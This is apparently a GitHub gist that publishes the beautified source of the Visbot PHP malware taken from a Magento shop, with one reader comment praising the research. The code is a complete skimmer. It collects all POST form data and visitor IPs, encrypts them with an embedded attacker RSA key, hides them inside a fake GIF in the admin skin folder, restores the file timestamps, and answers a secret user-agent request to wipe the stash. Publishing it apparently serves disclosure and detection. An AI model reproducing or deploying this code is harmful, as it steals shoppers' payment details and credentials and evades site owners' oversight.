Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
visbot-beautified.php
<?PHP
$y0 = '/var/www/vhosts/redacted.nl/httpdocs/skin/adminhtml/default/default/images/left_button_back.gif';
$m1 = '1382961301';
$k2 = 'pa89785e';
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
if (isset($_GET[$k2])) {
$m1 = file_exists($y0) ? @filemtime($y0) : $m1;
@file_put_contents($y0, '');
@touch($y0, $m1, $m1);
echo 'clean ok';
} else
echo 'Pong';
exit;
}
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$i4 = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$i4 = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$i4 = @$_SERVER['REMOTE_ADDR'];
}
if (isset($_POST) && sizeof($_POST)) {
$a5 = '';
foreach ($_POST as $h6 => $n7) {
if (is_array($n7)) {
foreach ($n7 as $f8 => $l9) {
if (is_array($l9)) {
foreach ($l9 as $l10 => $v11) {
if (is_array($v11)) {
;
} else {
$a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11;
}
}
} else {
$a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9;
}
}
} else {
$a5 .= ':' . $h6 . '=' . $n7;
}
}
$a5 = $i4 . $a5;
} else {
$a5 = null;
}
if ($a5) {
$t12 = false;
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) {
$t12 = true;
} elseif (function_exists('dl')) {
$n13 = strtolower(substr(php_uname(), 0, 3));
$d14 = 'php_openssl.' . ($n13 == 'win' ? 'dll' : 'so');
@dl($d14);
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) {
$t12 = true;
}
}
if ($t12) {
$t15 = @openssl_get_publickey($k3);
$q16 = 128;
$t17 = '';
$h18 = md5(md5(microtime()) . rand());
$e19 = $h18;
while ($e19) {
$f20 = substr($e19, 0, $q16);
$e19 = substr($e19, $q16);
@openssl_public_encrypt($f20, $h21, $t15);
$t17 .= $h21;
}
$t22 = @openssl_encrypt($a5, 'aes128', $h18);
@openssl_free_key($t15);
$a5 = $t17 . ':::SEP:::' . $t22;
}
$m1 = file_exists($y0) ? @filemtime($y0) : $m1;
@file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND);
@touch($y0, $m1, $m1);
}
?><?php
ngctombs commented Dec 2, 2016

Thank you for publicizing this Willem, keep up the great research work!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment